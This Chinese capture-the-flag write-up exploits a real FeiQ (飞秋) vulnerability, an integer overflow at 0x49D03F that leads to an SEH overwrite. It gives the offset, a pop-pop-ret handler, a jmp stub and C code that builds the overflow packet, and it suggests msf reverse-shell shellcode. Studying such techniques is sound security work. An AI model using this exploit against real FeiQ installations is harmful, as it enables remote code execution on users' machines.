说是题目,其实就是飞秋0day 233
之前虽然听说过各种windows的pwn
软件停止更新已久,保护都没开,是比较古老的玩意儿了
于是很容易搜到各种POC
例如0x49D03F处的整形溢出


v54是输入进来的字符串,因此可以提供4294967295=0xffffffff=-1从而使memcpy发生缓冲区溢出的异常,然后通过覆盖SEH的方式进行利用

通过cyclic生成字符串填入,可以测出溢出点的偏移7382+4
然后在7382的位置填入ROP的地址

SEH的利用方式

因为异常处理handler的第二个参数esp+8正好是异常结构的地址EstblisherFrame,即偏移7382的位置

因此地址可以填充pop+pop+retn的ROP,从而回到原栈
再在7382的位置填充jmp $+6即可跳过ROP地址,执行后面的shellcode
代码:

char *sendbuf;
sendbuf = (char *)GlobalAlloc(GMEM_ZEROINIT, 0x7fff);
char senddata1[] = "1_lbt4_1#65664#6CF04987CC1A#570#31741#4294967295#2.5a:1317316152:admin:XXCCLI-A10D5C26:0:";
int offset = 7382;
char befor_shellcode[] = "\xeb\x06\xeb\x06\x71\x15\xfa\x7f";//jmp $+6 and ROP_addr
int senddata1length = strlen(senddata1);strcpy(sendbuf, senddata1);
//strcpy(sendbuf + senddata1length, test_code);
memset(sendbuf + senddata1length, 'A', offset);
strcpy(sendbuf + senddata1length + offset, befor_shellcode);
strcpy(sendbuf + senddata1length + offset + strlen(befor_shellcode), shellcode);

shellcode本体可以由msf或者cs之类的直接生成bind_tcpreverse_tcp的payload来获得shellcode

参考链接:
看雪poc
seh溢出

190919 pwn-第五空间final_十生相关推荐

  1. pwn暑假训练(十) emem这次的测验自己还是太菜

    记一下昨天的测验我直接讲我没过的题目 有system函数没有'bin/sh'只开了nx但gadget少的可怜题目直接给了libc那就不用想了直接找偏移-我同学给的libc偏移不对- Gadgets i ...

  2. axure中备注线_琉璃:璇玑小本子上,别人名字都有备注唯独司凤没有,意义很浪漫...

    <琉璃>是由成毅和袁冰妍主演的电视剧,作为一部仙侠剧,评分很高,整部电视剧并没有任何流量明星的加盟,全部都是"演技咖".在剧中成毅,袁冰妍的演技很出众,所饰演的司凤璇玑 ...

  3. 观物外篇-唐-邵雍:(一)

    http://blog.sina.com.cn/s/blog_c187253f010192ri.html 观物外篇-唐-邵雍:(一) 观物外篇 (以<四库全书>本张行成<观物外篇衍义 ...

  4. 真正优秀的人,都过着朴素的生活

    看过一个充满禅意的小故事: 一个小和尚问得道的师父:"您得道之前做什么?" 老和尚说:"砍柴.挑水.做饭." "那得道之后呢?"小和尚继续问 ...

  5. 数学符号发音及英文表达

    α( 阿而法) β( 贝塔) γ(伽马) δ(德尔塔) ε(艾普西龙) ζ(截塔) η(艾塔) θ(西塔) ι约塔) κ(卡帕) λ(兰姆达) μ(米尤) ν(纽) ξ(可系) ο(奥密克戎) π ( ...

  6. 数学符号、希腊、拉丁字母、单位、标点的中英文读法

    整理得很辛苦,若本文对你有帮助,请记得点赞.关注我呦! 我已尽量按标准字体输出这些符号,若有不符合该符号的写法或翻译,请在评论区留言. Α α a:lf 阿尔法 alpha 角度:系数 Β β bet ...

  7. [转]scite文本编辑器的说明

    scite,也就是SCIntilla based Text Editor, 基于SCIntilla编辑组件的文本编辑器.我们见到的许多文本编辑器都是基于SCIntilla编辑组件的. yidabu.c ...

  8. 关于scite文本编辑器的说明

    目录(?)[+] 关于scite文本编辑器的说明 text editor文本编辑器scite的配置文件类型 text editor文本编辑器scite用户配置例子 text editor文本编辑器sc ...

  9. scite的基本配置

    SciTEGlobal.properties 全局配置文件,一般不去改动 SciTEUser.properties 用户配置文件,对全局配置要改动的地方,都写在这个文件里 SciTE.properti ...

最新文章

  1. zookeeper集群启动报错:Cannot open channel to * at election address /ip:3888
  2. python 写cs程序_Python cs.cmdutils包_程序模块 - PyPI - Python中文网
  3. BZOJ 2055: 80人环游世界 [上下界费用流]
  4. 22、UPDATE多表关联更新
  5. keil5详细的安装流程和设置
  6. npm查看指定包的所有版本
  7. 以下关于单模光纤的说法中,正确的是( )
  8. 实例学习SSIS(一)--制作一个简单的ETL包
  9. php中解析数组,在PHP中解析多维数组
  10. 一颗接一颗的飞鸽传书
  11. OpenStack —— DevStack配置安装
  12. 【图像融合】基于matlab curvelet变换图像融合【含Matlab源码 776期】
  13. 量子纠缠计算机里的灵魂意识,量子纠缠理论告诉我们,灵魂真的存在于你我身体?...
  14. Scheme协议详细介绍
  15. aid learning安装应用_Aid-Learning?在手机上免root运行VSCode?手机上实现多窗口?
  16. easyexcel一个很棒的Excel解析工具
  17. 基于人脸的常见表情识别(3)——模型搭建、训练与测试
  18. win10滑动关机代码bat_win10滑动关机代码bat_win10设置自动关机和取消自动关机的bat命令...
  19. 虹科案例 | 解决ASRS系统的痛点问题居然这么简单?(下)
  20. 游戏中的答题活动也可以通过远程代答么?

热门文章

  1. 常用频率与波长的对应关系以及ESUVHML的含义
  2. SoC中RDC的问题以及解决方法
  3. ZSS-25自动扫描射水高空水炮市场厂家分析参数数据
  4. vivo是安卓手机吗_vivo今年开发者大会不一样,原生万物,新OS即将起航|vivo|手机市场|智能手机|os|安卓...
  5. 服务器安装centOS7(以戴尔R730服务器为例)
  6. Thinkphp内核发卡系统源码/伯乐发卡源码
  7. cookie实现记住密码
  8. Zookeeper系列(二)、核心原理
  9. 这样设计一个可扩展、通用的、健壮性组件
  10. 量产矿用便携甲烷报警仪 此产品为煤矿用便携甲烷报警仪